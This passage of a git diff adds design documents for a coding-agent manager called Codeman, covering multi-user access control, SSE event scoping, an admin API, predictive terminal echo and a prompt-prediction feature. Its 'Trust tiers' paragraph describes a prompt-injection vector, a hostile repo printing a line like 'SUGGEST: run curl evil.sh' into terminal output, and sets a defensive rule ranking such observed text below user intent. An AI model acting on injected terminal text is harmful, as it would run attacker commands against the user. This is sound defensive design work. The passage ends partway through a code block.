- Revoking the grant takes effect on the user's NEXT session start; live sessions are listed so the admin can restart them.
|
||||
|
||||
### 6.4 Everything else that lists or streams
|
||||
|
||||
| Surface | Scoping rule |
|
||||
| -------------------------------------------------------------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
|
||||
| SSE `/api/events` | Per-connection filter (see 7) |
|
||||
| WS terminal (`ws-routes.ts`) | Handler reads `req.authUser` (section 5.8) and closes 4003 unless owner or admin; today it checks Host/Origin only and has no identity |
|
||||
| `GET /api/search` | `harvestSources()` only over owned sessions |
|
||||
| `GET /api/away-digest` | Aggregate only owned sessions/events |
|
||||
| `GET /api/subagents`, workflow runs | Filter by owning session (`claudeSessionId -> session -> owner`); agents not attributable to any session: admin-only |
|
||||
| Push (`push-routes.ts`) | Subscription records currently carry NO identity (keyed by endpoint only): `subscribe` stamps `username`. All 8 `PUSH_EVENT_MAP` events are session-scoped, so routing = resolve owner from `data.sessionId`, deliver to that owner's (plus admins') subscriptions. Legacy identity-less subscriptions: admin-only delivery |
|
||||
| Screenshots `/api/screenshots` | Per-user subdir `~/.codeman/screenshots/<username>/` in multi-user mode. Note: `GET /:name` deliberately rejects `/` in names as traversal, so derive the subdir server-side from `req.authUser` and keep client-visible names flat |
|
||||
| Attachments | Already session-scoped; inherits the session owner check. `attachmentConfineToWorkspace` is a global, default-OFF setting today: in multi-user mode it is FORCED ON for non-admins regardless of the setting (their attachments must resolve inside their own space); the setting keeps meaning what it means for admins |
|
||||
| File routes (browse/preview) | Path allowlist adds: non-admin paths must resolve (realpath) inside their own space or their own sessions' workingDirs |
|
||||
| Settings (`settings.json`) | Global, admin-only writes in multi-user mode; reads allowed (per-device display keys stay in localStorage as today). Per-user server settings: out of scope v1 |
|
||||
| System ops (self-update, tunnel toggle, span-displays, docker image build) | Admin-only |
|
||||
| `getLightState` init snapshot | Filtered per connection. Actual contents to filter (verified): `sessions`, `scheduledRuns`, `respawnStatus`, `subagents`, `workflowRuns`, `planUsage` (host-plan telemetry: admin-only); `globalStats` stays coarse-global. Cron jobs are NOT in the snapshot (they have their own REST route; filter there). The snapshot is cached process-wide (`LIGHT_STATE_CACHE_TTL_MS`): either key the cache per role/user or filter AFTER the cache on each send |
|
||||
|
||||
## 7. SSE Event Filtering
|
||||
|
||||
`/api/events` currently broadcasts everything to everyone. Ground truth first (verified): `broadcast()` lives in `SseStreamManager` (`sse-stream-manager.ts`), not server.ts; clients are keyed by the raw Fastify reply (`sseClients: Map<FastifyReply, Set<string> | null>`, plus `sseClientsById` for live filter updates); the existing `?sessions=` filter is a bandwidth optimization applied ONLY to `session:terminal` batches in `flushSessionTerminalBatch()`, while `broadcast()` itself loops ALL clients unconditionally. The single-client delivery primitive already exists (`sendSSE`, used for the per-connection init snapshot). Plan:
|
||||
|
||||
- At connection time, resolve `req.authUser` and store `{ username, role }` with the client. Concretely: extend `addClient(reply, sessionFilter, isRemote, clientId)` to take the identity and change the `sseClients` map value to `{ filter, identity }` (or add a parallel `Map<reply, identity>`); there is no per-client record object today to hang it on.
|
||||
- `broadcast()` gains an optional routing hint: `broadcast(event, data, { sessionId?, adminOnly?, username? })`. Resolution order per client: admin sees all; `username` targets one user; `sessionId` resolves owner via SessionManager; `adminOnly` for machine-level events (docker image builds, tunnel, self-update); no hint = broadcast to all (connection status etc.).
|
||||
- **Enforce the identity check in BOTH `broadcast()` AND `flushSessionTerminalBatch()`**: the terminal batch path does not go through `broadcast()`, and it carries the highest-value payload (raw terminal bytes).
|
||||
- Sweep of the ~120 backend event constants in `sse-events.ts`: mechanically, everything `session:*`, `ralph:*`, `respawn:*`, `subagent:*`, `workflow:*`, `attachment:*`, `cron:*` (job owner) carries or can resolve a sessionId/owner; `docker:*`, `system:*`, tunnel and update events are adminOnly; a short tail needs case-by-case decisions during implementation.
|
||||
- The existing `?sessions=` filter and `/api/events/subscribe` compose with (never override) the ownership filter: the subscription filter can only narrow within what the identity allows.
|
||||
|
||||
## 8. Admin API (`src/web/routes/admin-routes.ts`, new module + `AdminPort`)
|
||||
|
||||
All handlers: multi-user mode only (404 otherwise), `requireAdmin`, Zod schemas in `schemas.ts`, `ApiResponse` envelope, audit-logged.
|
||||
|
||||
| Endpoint | Behavior |
|
||||
| ------------------------------------------------ | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
|
||||
| `GET /api/admin/users` | List users + stats: role, disabled, createdAt, lastLoginAt, live session count, case count, space disk usage (best-effort async walk, cached 60s), active cookie-session count |
|
||||
| `POST /api/admin/users` | Create: `{ username, role, password? }`. No password given: generate a one-time password, return it ONCE in the response, set `mustChangePassword` |
|
||||
| `PATCH /api/admin/users/:username` | `{ role?, disabled?, canBypassPermissions? }`. Demoting/disabling the last enabled admin: 409 `LAST_ADMIN`. Disable also revokes cookie sessions. `canBypassPermissions` is the section 6.3 grant (default false) |
|
||||
| `POST /api/admin/users/:username/reset-password` | Generates one-time password (returned once), sets `mustChangePassword`, revokes cookie sessions |
|
||||
| `POST /api/admin/users/:username/logout` | Revoke all cookie sessions for that user. Honest limit under Basic auth: the browser silently re-sends cached credentials and gets a fresh cookie on the next request, so logout only truly ends QR-issued sessions; to actually lock someone out, disable the account or reset the password. Say so in the panel tooltip until Phase 6 |
|
||||
| `DELETE /api/admin/users/:username` | `{ deleteSpace?: boolean }` (default false). Refuses last admin. Kills the user's live sessions first (normal kill flow, incl. docker/remote teardown per case), revokes cookies, removes from store. With `deleteSpace`: guarded recursive delete of `~/codeman-users/<username>` (realpath must be inside `USER_SPACES_DIR`, top-level dir must not be a symlink), plus their registry entries and push subscriptions |
|
||||
| `POST /api/admin/cases/assign` | Move a legacy `~/codeman-cases/<case>` into a user's space (`fs.rename`) |
|
||||
| Self-service `GET /api/me` | `{ username, role, mustChangePassword }` (works in single-user mode too: synthetic admin; the frontend uses it to decide whether to render admin UI) |
|
||||
| Self-service `POST /api/me/password` | `{ currentPassword, newPassword }`, verifies current, min length 8, revokes other sessions, clears `mustChangePassword` |
|
||||
|
||||
**Audit log**: append-only `~/.codeman/admin-audit.jsonl` (same idiom as `session-lifecycle.jsonl`): timestamp, acting admin, action, target, request IP. User management without an audit trail is not acceptable even for a homelab tool.
|
||||
|
||||
SSE additions (both `sse-events.ts` and `constants.js`): `admin:usersChanged` (adminOnly; the panel re-fetches) and `auth:passwordChangeRequired` (targeted to the user).
|
||||
|
||||
## 9. Frontend
|
||||
|
||||
- **`GET /api/me` on boot** (app.js init): stores `window.__codemanUser`; everything below keys off it. Single-user mode returns the synthetic admin, so the UI needs no mode awareness beyond "am I admin".
|
||||
- **Admin panel**: new tab "Users" in the App Settings modal (settings-ui.js), rendered only for admins in multi-user mode. Table of users with actions (create, reset password showing the one-time password in a copy-to-clipboard reveal, enable/disable, role toggle, logout, delete with a typed-username confirm for the delete-space variant). No new header button (mobile header policy test stays green; the settings modal is already reachable everywhere).
|
||||
- **Change-password modal**: shown on `PASSWORD_CHANGE_REQUIRED` (fetch interceptor in api-client.js) and reachable from settings for self-service.
|
||||
- **Owner badges**: admin's session tabs and the session palette/manager show `owner` on foreign sessions; regular users see no change.
|
||||
- New module `admin-ui.js` if the settings-ui.js addition gets large (load order after settings-ui, before session-ui), else keep inside settings-ui.js. Follow the `@fileoverview` + `@loadorder` convention either way.
|
||||
|
||||
## 10. CLI Additions (`src/cli.ts`)
|
||||
|
||||
Headless bootstrap and recovery must not require the web UI:
|
||||
|
||||
```
|
||||
codeman users add <name> [--admin] # prompts for password (hidden input), or --password-stdin
|
||||
codeman users passwd <name> # reset password
|
||||
codeman users list
|
||||
codeman users rm <name> [--delete-space]
|
||||
```
|
||||
|
||||
These operate directly on `users.json` via `user-store.ts` (no server needed), honoring `CODEMAN_INSTANCE`. This is also the answer to "locked out: last admin forgot password".
|
||||
|
||||
## 11. Limits and Config
|
||||
|
||||
- New `src/config/multiuser.ts`: `isMultiUserMode()`, `USER_SPACES_DIR` (`~/codeman-users`, overridable via `CODEMAN_USER_SPACES_DIR` for tests), `MAX_USERS` (default 25), per-user session cap (default: global cap / 2, env `CODEMAN_MAX_SESSIONS_PER_USER`).
|
||||
- Cap enforcement is currently COPY-PASTED: the global `MAX_CONCURRENT_SESSIONS` (50, `config/map-limits.ts:25`) check appears at 6 independent sites (session-routes.ts:298/1622/1683, ralph-routes.ts:275, cron-service.ts:340, server.ts:1595). Do not add a 7th copy per site: extract one `assertSessionCapacity(ctx, owner?)` helper doing the global + per-user checks and use it everywhere, or the per-user cap WILL miss a path.
|
||||
- Global limits (50 sessions, SSE clients 100, terminal buffers) are unchanged and shared; the per-user session cap is the fairness lever.
|
||||
|
||||
## 12. Compatibility Matrix
|
||||
|
||||
| Concern | Guarantee |
|
||||
| ------------------ | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
|
||||
| Default (no flag) | No behavior change. No new file reads on the hot path. All new fields optional in state |
|
||||
| State round-trip | `SessionState.owner`, `MuxSession.owner`, `CronJob.owner`, registry `owner` fields are optional; old state loads clean; new state loaded by an old build ignores unknown fields (existing tolerant parsing) |
|
||||
| Instance isolation | `users.json`, audit log, screenshots subdirs all via `dataPath()`; user spaces dir is shared across instances like `~/codeman-cases` is today (documented) |
|
||||
| API versioning | HTTP API is internal per `docs/versioning-policy.md`; still, all changes are additive. Ship as a **minor** version |
|
||||
| Hooks | Unchanged (instance-level hook secret; owner resolved from the session) |
|
||||
|
||||
## 13. Implementation Phases
|
||||
|
||||
Each phase is independently shippable behind the flag and ends with its tests green.
|
||||
|
||||
**Phase 1: user store + mode plumbing** (no behavior change yet)
|
||||
`src/user-store.ts`, `src/config/multiuser.ts`, CLI `users` subcommands, bootstrap-on-first-boot logic, `users.json` schema + atomic writes.
|
||||
Tests: `test/user-store.test.ts` (hashing, verify, params upgrade, username validation, atomic write, last-admin invariants; pure, no server).
|
||||
|
||||
**Phase 2: multi-user auth**
|
||||
Auth middleware branch, `req.authUser` decoration, cookie records with username/role, per-username rate bucket, `mustChangePassword` gate, WS upgrade identity plumbing + unauthenticated-upgrade regression test (section 5.8), QR on-demand minting + identity binding (section 5.9), `GET /api/me`, `POST /api/me/password`, error codes, network-bind check integration.
|
||||
Tests: `test/multiuser-auth.test.ts` (live server, unique port 3170+; wrong password, disabled user, cookie carries identity, per-user rate limit isolation, mustChangePassword lockbox, QR redemption identity). Reuse the `delete process.env.CODEMAN_PASSWORD` idiom from `test/setup.ts`.
|
||||
|
||||
**Phase 3: ownership threading**
|
||||
Session `owner` + persistence + `MuxSession` mirror + recovery; `resolveCasesDir()` refactor across case/session/ralph/plan routes (consolidating the duplicated case-path resolution); registry owner fields incl. the linked-cases v2 shape; `findSessionOrFail` owner check + the direct-`sessions.get` audit; list filtering; owner stamping across ALL create paths from 6.1; **non-admin workingDir confinement** (6.2); permission-mode/shell/launchCommand policy (6.3); `assertSessionCapacity` helper + per-user cap.
|
||||
Tests: `test/routes/ownership-scoping.test.ts` (inject-based: user A cannot read/kill/input user B's session, case lists are disjoint, admin sees both), extend `test/cron-service.test.ts` for owner stamping, recovery round-trip in the existing mux-recovery tests.
|
||||
|
||||
**Phase 4: event fan-out + remaining surfaces**
|
||||
SSE routing hints + client identity (enforced in BOTH `broadcast()` and the terminal-batch flush), WS owner gate (identity landed in Phase 2), search/digest/subagent/workflow scoping, push subscription identity + owner routing, screenshot subdirs, file-route scoping, `getLightState` filtering + per-identity caching, admin-only system ops.
|
||||
Tests: `test/sse-ownership.test.ts` (two SSE clients, event for A's session reaches only A + admin), WS upgrade rejection test, search/digest scoping tests.
|
||||
|
||||
**Phase 5: admin API + frontend**
|
||||
`admin-routes.ts` + `AdminPort` + schemas + audit log + `admin:usersChanged`; settings-ui Users tab, change-password modal, owner badges, api-client interceptor.
|
||||
Tests: `test/routes/admin-routes.test.ts` (CRUD, last-admin 409, one-time password flow, delete-space guard rails incl. symlink refusal), frontend vm-sandbox test following `test/run-mode-ui.test.ts` pattern, Playwright pass per the always-end-to-end rule before calling it done.
|
||||
|
||||
**Phase 6 (optional, later): login page**
|
||||
Replace Basic with a form + `POST /api/login` in multi-user mode only (fixes browser credential caching UX, enables logout button). Explicitly deferred; Basic works for v1.
|
||||
|
||||
**Docs**: update `docs/security-architecture.md` (new section: multi-user model + threat model from section 2), `README.md` (short opt-in section), `CLAUDE.md` (Key Patterns entry + State Files + route/SSE counts), this file gets a "shipped" status stamp per phase.
|
||||
|
||||
## 14. Key Risks / Decisions Made
|
||||
|
||||
1. **Not a security boundary at the agent layer** (section 2). Decided: ship with loud documentation; Docker cases are the isolation story.
|
||||
2. **`findSessionOrFail` as the single enforcement point** for ~30 session routes: any route that fetches sessions another way must be audited in Phase 3 (grep for `sessionManager.getSession` outside route-helpers).
|
||||
3. **SSE sweep is the riskiest surface**: a missed event leaks metadata (not terminal content, which is session-scoped, but names/paths). Phase 4 includes a checklist pass over all ~138 events with the default flipped to "owner-scoped unless explicitly global": fail closed.
|
||||
4. **Basic-auth password-change UX** is mediocre (browser re-prompt). Accepted for v1; Phase 6 fixes it properly.
|
||||
5. **Legacy case migration** is manual (admin assigns). No silent moves of user data.
|
||||
6. **Case-name uniqueness becomes per-user**; tmux session names already include the session id so no collision, but the `w<n>-<case>` tab naming and lifecycle-log rows should include the owner for disambiguation in admin views.
|
||||
7. **`workingDir` confinement (6.2) is the single most load-bearing rule**: every file-serving and agent-spawning surface downstream trusts `session.workingDir`. Review and test it as carefully as the auth branch (foreign-space path, symlink into a foreign space, `..` traversal, cron fire-time re-check).
|
||||
8. **The WS handler never sees identity today** (auth happens only in the global hook): the 5.8 wiring is new code on a security-sensitive path; cover unauthenticated, foreign-user, and admin upgrades with tests.
|
||||
|
||||
## 15. Open Questions (answer before Phase 3)
|
||||
|
||||
1. Should admins' own cases live in `~/codeman-users/<admin>/cases` (symmetric, proposed) or keep using legacy `~/codeman-cases`? Proposed: symmetric; legacy dir is a migration source only.
|
||||
2. Per-user settings (respawn presets, notification prefs): global-only in v1. Worth a `users/<name>/settings.json` overlay later?
|
||||
3. Should regular users be allowed to create Docker cases on admin-defined hosts (proposed: yes) or is Docker entirely admin-only?
|
||||
4. Session handoff: does an admin need "reassign session/case to another user"? (Cheap to add next to `cases/assign`; not in v1 scope.)
|
||||
5. Permission-mode grants (section 6.3): one `canBypassPermissions` flag covering Claude/Codex/Gemini bypass equivalents PLUS shell mode and cron `launchCommand` (proposed: one flag, keep it one-bit), or split into `canBypassPermissions` + `canRunArbitraryCommands`? And should admins be able to set a per-user DEFAULT mode (for example force `normal` for an intern) rather than just gating bypass?
|
||||
6. OpenCode has no single bypass flag (its permission config rides `OPENCODE_CONFIG_CONTENT`): decide what the grant means there before Phase 3, or exclude OpenCode mode for non-granted users in v1.
|
||||
@@ -0,0 +1,143 @@
|
||||
# Predictive write-through echo for codex
|
||||
|
||||
Zero-lag local echo for codex sessions via a second, mosh-style mode in the
|
||||
`xterm-zerolag-input` package: every keystroke goes to the PTY exactly as the
|
||||
1.12.2 overlay-disabled path did (byte-identical wire behavior), while a
|
||||
`PredictiveEchoAddon` simultaneously paints the predicted glyph at the predicted
|
||||
cell. When the real echo lands, the prediction is confirmed and its span removed
|
||||
(invisible swap: identical glyph beneath). Mispredictions drop via a mismatch
|
||||
cascade + TTL. Visual-only, self-healing.
|
||||
|
||||
## Why this exists
|
||||
|
||||
Issues #218/#219/#220/#222 (one root cause) forced 1.12.2 to disable the
|
||||
LocalEchoOverlay for codex: buffer-until-Enter starves codex's per-keystroke TUI
|
||||
(live slash picker, arrows editing server-side composer state, composer
|
||||
rewrap/growth, paste_burst classification). Buffer mode is structurally
|
||||
incompatible with codex; write-through prediction is the only echo mode that
|
||||
can coexist with it.
|
||||
|
||||
## The reconciliation lesson (do not regress this)
|
||||
|
||||
`docs/local-echo-overlay-plan.md` ("What NOT to Do") documented that matching
|
||||
predictions against the raw output STREAM fails against Ink/TUI full-line
|
||||
redraws. This design reads the parsed terminal BUFFER instead (cells after
|
||||
xterm's parser ran), which converges to the same cells no matter how the bytes
|
||||
arrived. The Phase 0 recordings prove the point twice over: tmux converts
|
||||
codex's full-line redraws into minimal in-place deltas (an echo arrives as
|
||||
`e\x1b[K\x1b[20;80H...`), and codex itself paints word gaps with ECH+cursor-forward
|
||||
instead of spaces. Stream matching can never survive that; buffer diffing does
|
||||
not care.
|
||||
|
||||
## Phase 0 measurements (codex-cli 0.147.0 via tmux, 100x30, 2026-08-09)
|
||||
|
||||
Recorded with `scripts/dev/record-codex-frames.mjs` (production pipeline:
|
||||
codex inside tmux `status off`, chunks passed through the same full strip
|
||||
`session.ts _handleTerminalOutput()` applies to codex mode). Fixtures in
|
||||
`packages/xterm-zerolag-input/test/fixtures/codex/`; replay/measure with
|
||||
`scripts/dev/analyze-codex-frames.mjs <fixture>`.
|
||||
|
||||
| Question | Measured answer |
|
||||
| --------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
|
||||
| Composer signature | Cursor row starts `"› "` (U+203A + space), text begins col 2. Present when empty (placeholder), while typing, and while the slash picker filters. `CODEX_COMPOSER_ROW_RE = /^› /` |
|
||||
| Composer text color | Plain default foreground, zero SGR around echoed chars. Span `foregroundColor` default (theme fg) is an exact match |
|
||||
| Placeholder | Cycling hint text ("Use /skills...", "Improve documentation in @filename", ...) rendered AT the cursor cell. First prediction lands over placeholder glyphs: covered by the snapshot + cursor-advance rules |
|
||||
| Wrap | Word-wrap near `cols - 2`; continuation rows are indented 2 spaces WITHOUT `› `. The gate therefore suppresses predictions on wrapped lines: deliberate fallback to real echo, wrap was the #220 ghost zone. `edgeMarginCells = 4` |
|
||||
| Modal (trust dialog) | Cursor parks on `" Press enter to continue"`: no `› ` prefix, gate false, zero predictions painted while keystrokes still reach the PTY (the ghost eliminator) |
|
||||
| Streaming | Error/reconnect bursts render above a re-rendered composer that keeps the `› ` signature; end-of-frame cursor parks at the insertion point (col 2 of the composer row). Confirms the cursor-advance confirm rule and the no-drop-on-baseY rule |
|
||||
| Echo shape under tmux | tmux emits minimal deltas for simple echoes and full repaints for busy frames; both converge in the parsed buffer |
|
||||
| Slash picker | Picker rows render below; the cursor row keeps the composer signature and advances per filter char, so predictions stay active while filtering (#222 surface) |
|
||||
|
||||
Constants decided at the Phase 0 gate: `CODEX_COMPOSER_ROW_RE = /^› /`,
|
||||
`ttlMs = 1000`, `maxPending = 32`, `cursorGraceMs = 150`, `edgeMarginCells = 4`,
|
||||
span colors = theme defaults, `underlinePredictions = false`.
|
||||
|
||||
## Algorithm
|
||||
|
||||
See `PredictiveEchoAddon` in
|
||||
`packages/xterm-zerolag-input/src/predictive-echo-addon.ts`. Summary of the
|
||||
rules and why each exists:
|
||||
|
||||
- **State**: ordered `PredictionRecord[]` (`seq`, `char`, `width`, cumulative
|
||||
`offsetCells`, `snapshot` of the cell at predict time, `sentAt`,
|
||||
`mismatches`), plus a run `_anchor {row, col}` captured when the outstanding
|
||||
count goes 0 -> 1. Positions are FIXED at predict time; confirmation deletes
|
||||
spans and never re-lays-out, so partial confirmation causes zero jitter.
|
||||
- **predictChar(ch)** runs an inline reconcile first and re-anchors whenever
|
||||
outstanding drains to zero (absorbs the echo-landed-between-keystrokes race).
|
||||
Guards: dims present, cursor numbers present, `viewportY === baseY`,
|
||||
`predictWhen` gate, single codepoint >= 0x20 (not 0x7f), width <= 2,
|
||||
`maxPending`, edge margin. Returns false = suppressed; the consumer sends the
|
||||
keystroke regardless.
|
||||
- **Coordinate base is `baseY`**: xterm's `cursorY` is baseY-relative, so
|
||||
absolute buffer line = `baseY + row`. `viewportY` would only coincide while
|
||||
the scrolled-to-bottom guards hold; the addon never relies on that.
|
||||
- **reconcile()** (debounced `onWriteParsed` microtask, inline in predictChar,
|
||||
TTL timer): clears everything when scrolled up; off-anchor-row cursor
|
||||
tolerated for `cursorGraceMs` then clears; PREFIX-ONLY confirm loop requiring
|
||||
cell match AND cursor advanced past the record (prevents false confirms
|
||||
against placeholder glyphs and makes identical in-place tmux repaints a
|
||||
no-op); TWO-PASS mismatch rule (a cell that is neither snapshot nor predicted
|
||||
char must persist across two passes before cascading the drop: a half-parsed
|
||||
row on pass N is fully redrawn a few ms later); TTL drop of the stale suffix.
|
||||
- **No drop on baseY change**: codex streams push lines to history while the
|
||||
composer stays viewport-pinned; predictions are row-relative to the pinned
|
||||
composer and remain valid (measured above).
|
||||
- **Anchor hold** (added by the independent post-build review): after any wire
|
||||
input whose cursor effect the display has not shown yet (backspace with
|
||||
nothing outstanding = deleting echoed text, every 'clear'-classified input,
|
||||
an IME/plain-paste 'text' commit, and the bypass send paths), new
|
||||
predictions are suppressed until the next PARSED write. Anchoring on the
|
||||
stale cursor painted ghosts one cell off ("tehh" on backspace-then-retype
|
||||
within RTT), blank-neutral and therefore TTL-lived. Worst case is exactly
|
||||
one unpredicted keystroke: its own echo is a write, which releases the hold.
|
||||
- **predictBackspace()** pops the newest outstanding record (informational
|
||||
return; the consumer forwards `\x7f` unconditionally). Deleting already-echoed
|
||||
text renders at RTT in v1.
|
||||
- **CJK/wide**: 2-cell spans, stacking by cumulative visual width, leading-cell
|
||||
confirm. In Codeman, IME input never reaches the hook (`window.cjkActive`
|
||||
returns from onData first); package support exists for other consumers.
|
||||
|
||||
## Integration map (Codeman)
|
||||
|
||||
- Policy: `_localEchoPolicy` (`'buffer' | 'predict' | 'off'`) computed at the
|
||||
end of `_updateLocalEchoState()`; codex + `localEchoEnabled` -> `'predict'`
|
||||
while `_localEchoEnabled` stays false (every 1.12.2 consumer unchanged).
|
||||
- onData hook sits between the buffer block and Normal Mode, classifies via
|
||||
`classifyPredictInput()` (pure, on `window.CodemanTerminalInput`), never
|
||||
returns, try/catch-wrapped: the wire path below is byte-identical with the
|
||||
predictor active, absent, or throwing.
|
||||
- Composer gate: `isCodexComposerRow()` set via `setPredictWhen()` at
|
||||
construction (the vendor footer stays package-agnostic).
|
||||
- Second vendor bundle `vendor/xterm-predictive-echo.js` (postinstall + build);
|
||||
the zerolag bundle build command is untouched and its output byte-identical.
|
||||
Missing/broken bundle = plain 1.12.2 echo (`typeof PredictiveEchoOverlay ===
|
||||
'undefined'` guard).
|
||||
- Prediction clears on: tab switch, SSE reconnect init, `insertTerminalText`,
|
||||
`clearTerminalInput`, voice send, keyboard-accessory `sendKey`, resize, skin
|
||||
and font changes re-read style via `refreshFont()`.
|
||||
|
||||
## Risk register
|
||||
|
||||
Eliminated structurally: other-mode regression (zero edits to buffer
|
||||
addon/branches, byte-identical existing bundle, policy-matrix + byte-identity
|
||||
tests); bundle breakage (separate bundle, graceful degradation); wire
|
||||
corruption (no-return fall-through + try/catch + byte-identity pins at vm and
|
||||
E2E level); modal ghosts (measured predictWhen gate); false confirms
|
||||
(cursor-advance rule); mid-parse flicker drops (two-pass rule); wrap
|
||||
misplacement (edge margin + continuation-row gate fallback + off-row grace).
|
||||
|
||||
Accepted residuals (visual-only, self-healing <= ttlMs, kill-switchable via
|
||||
`localEchoEnabled` per device): no predictions on wrapped continuation lines
|
||||
(gate false there, deliberate); brief dropout during composer growth; DOM-span
|
||||
vs WebGL glyph rendering can differ subtly (same trade-off as the buffer
|
||||
overlay, same font recipe); typing during an unsynchronized half-frame can
|
||||
mis-anchor one run (mismatch/TTL cleans within 1s).
|
||||
|
||||
## Future work
|
||||
|
||||
RTT-adaptive TTL; mosh-style confidence gating (paint only after the link
|
||||
proves laggy); predicted backspace into echoed text; predict mode for shell
|
||||
prompts; unifying the small font/container duplication between the two addons
|
||||
once predict mode has proven out; continuation-line prediction behind a
|
||||
smarter composer-extent detector.
|
||||
@@ -0,0 +1,140 @@
|
||||
# Read My Mind (design)
|
||||
|
||||
A 🧠 button that predicts the prompt you were about to type. Codeman keeps a per-case **intent profile** (your stated goals plus the real prompts you recently sent), feeds it and the live pane tail to a one-shot `claude -p`, and shows the predicted next prompt in a plan-mode-style approval dialog: **Send** / **Rethink** (with an optional steer note) / **Insert** (drop it on the composer to edit) / **Dismiss**. It is also a skill surface: the agent can read the intent profile, record intentions, and request a prediction over the HTTP API. Suggestions are **never auto-sent**; the human click is the boundary.
|
||||
|
||||
## UX flow
|
||||
|
||||
1. User hits 🧠 (desktop header button; phone: keyboard-accessory key).
|
||||
2. Modal opens with a spinner, then the top suggestion in an editable single-line field, rationale below it, up to 2 alternates as tappable rows.
|
||||
3. Buttons: **Send** (submits with `\r`), **Insert** (sends without `\r`, so the text sits unsubmitted on the CLI composer for editing, a documented mechanism), **Rethink** (optional free-text steer, e.g. "no, I meant the mobile bug", re-runs with the rejected suggestions included), **Dismiss**.
|
||||
4. Accepted prompts flow back into the intent history like any other sent prompt, so the profile self-corrects.
|
||||
|
||||
## Scope (v1)
|
||||
|
||||
- Claude mode only (capture rides Claude transcripts; external CLIs have no transcript watcher). Mirrors the approvals-inbox scoping.
|
||||
- Opt-in: `readMyMindEnabled`, synced, default **OFF**. While OFF: no capture, no UI surfaces. Privacy first, and every press costs real tokens.
|
||||
- One prediction in flight per session; the button disables while checking.
|
||||
- Sync request/response (the predictor takes 5-30s; agent-wait long-polls already hold requests longer). No new SSE events in v1.
|
||||
|
||||
## Data model
|
||||
|
||||
Per case, not per session: intentions outlive `/clear` and respawns.
|
||||
|
||||
```ts
|
||||
interface IntentProfile {
|
||||
key: string; // sha256(owner + ':' + realpath(workingDir)).slice(0, 16)
|
||||
workingDir: string;
|
||||
updatedAt: number;
|
||||
goals: string; // freeform markdown, user/agent editable, ≤ 8 KB
|
||||
recentPrompts: { ts: number; sessionId: string; text: string }[]; // FIFO cap 50, each ≤ 500 chars
|
||||
}
|
||||
```
|
||||
|
||||
Storage: `dataPath('intents.json')`, written mode 0600 (prompts can contain secrets; same posture as `users.json`). Never enters the `/api/search` index. Add to the CLAUDE.md State Files list.
|
||||
|
||||
## Intent capture
|
||||
|
||||
**Source: the session transcript, not the input paths.** `POST /api/sessions/:id/input` sees only programmatic input, and the WS channel delivers raw keystrokes (`session.write(msg.d)`), so neither yields clean submitted prompts. Claude's own JSONL transcript records every user turn as structured text, and `transcript-watcher.ts` already tails it. Add a `userPrompt` event there:
|
||||
|
||||
- Emit for `type: 'user'` entries whose content is a string or contains a text block; skip entries that are only `tool_result` blocks (tool results are wrapped as user messages).
|
||||
- Skip `<command-name>` / `<local-command-stdout>` tagged entries (local slash-command echo, not intent).
|
||||
- Skip texts < 3 chars (menu digits, Esc artifacts), truncate to 500, drop consecutive duplicates ("continue" spam from auto-resume stays but dedupes).
|
||||
|
||||
`IntentStore` (new `src/intent-store.ts`, pure core + IO wrapper, in the style of `session-order.ts`) subscribes via session wiring, gated on the setting resolved from **merged** settings per the partial-PUT rule.
|
||||
|
||||
## Context assembly (how the mind reading actually works)
|
||||
|
||||
The quality of the suggestion is decided before the model ever runs, by what we put in front of it. A new pure function `buildPredictionContext()` (in `src/readmymind-context.ts`, unit-testable with fixtures, no IO of its own; collectors inject their data) assembles a budgeted, priority-ordered prompt from every signal Codeman already has:
|
||||
|
||||
| # | Source | What it contributes | Cap |
|
||||
| - | ------ | ------------------- | --- |
|
||||
| 1 | **Pending dialog** (approvals-inbox store, when present) | If the session is sitting on an AskUserQuestion / permission / idle prompt, the honest "next prompt" is an *answer*. The dialog text + parsed options go in first and the model is told to answer it. | 2 KB |
|
||||
| 2 | **User goals** (`goals` from the intent profile) | The only fully-trusted statement of what the user wants. Highest authority in the trust ranking below. | 8 KB |
|
||||
| 3 | **Last assistant turn** (transcript, not the pane) | Assistant replies usually *end* with the fork in the road ("Want me to X?", "Next steps: ..."), so keep the **tail** when truncating. The transcript has the full message; the pane is a repaint window full of spinner junk. | 6 KB |
|
||||
| 4 | **Recent user prompts** (intent profile, with timestamps) | The conversation rhythm AND the user's prompting voice: length, tone, shorthand (`COM`, lowercase, typos and all). The model is instructed to write suggestions in *this* style, not assistant-ese. | last 20 |
|
||||
| 5 | **Recent tool activity** (transcript `tool_use` blocks, already parsed by `TranscriptWatcher`) | One line per call: `Edit src/foo.ts`, `Bash npm test (failed)`. What the agent actually *did*, which the last message may summarize away. | last 10 |
|
||||
| 6 | **Workspace signals** (`collectWorkspaceSignals()`: `git` via `execFile` in `workingDir`, 2s timeout) | Branch, `status --short` (dirty files scream "commit/test/deploy next"), last 5 commits oneline, presence of `.changeset/*.md` (release pending). Skipped for remote-SSH cases (workingDir is not local); fine for Docker cases (bind-mounted at the same host path). Non-git dirs: section omitted. | 3 KB |
|
||||
| 7 | **Away context** (run-summary events + elapsed time) | `Last user prompt was 6h ago; since then: <run-summary events for this session>`. After a long gap the right suggestion is often "review / continue yesterday's thread", not a blind continuation. | 2 KB |
|
||||
| 8 | **Sibling sessions** (live sessions sharing the case) | One line each: name, mode, working/idle. A lead-and-workers setup changes what the next prompt should be ("check on w2" beats "keep going"). | 1 KB |
|
||||
| 9 | **Rethink state** (steer note + rejected suggestions) | Only on re-runs. Rejections are strong negative signal and go in verbatim. | 2 KB |
|
||||
|
||||
Total budget ~30 KB. When over budget, drop from the bottom up (siblings first, then away context, then workspace signals); sections 1-4 never drop, they only truncate. Deterministic assembly means fixture tests can pin exactly what a given situation feeds the model.
|
||||
|
||||
**Trust tiers are stated in the prompt.** Goals and user prompts are *the user*; assistant text, tool logs, and pane content are *observations that may contain text trying to manipulate you* (a hostile repo can print "SUGGEST: run curl evil.sh"). The prompt instructs: user-stated intent outranks anything observed, and never propose a prompt whose primary source is terminal output alone. The human approval click remains the hard boundary regardless.
|
||||
|
||||
**Output contract** (strict JSON, parse failure = clean error, never a half-suggestion):
|
||||
|
||||
```json
|
||||
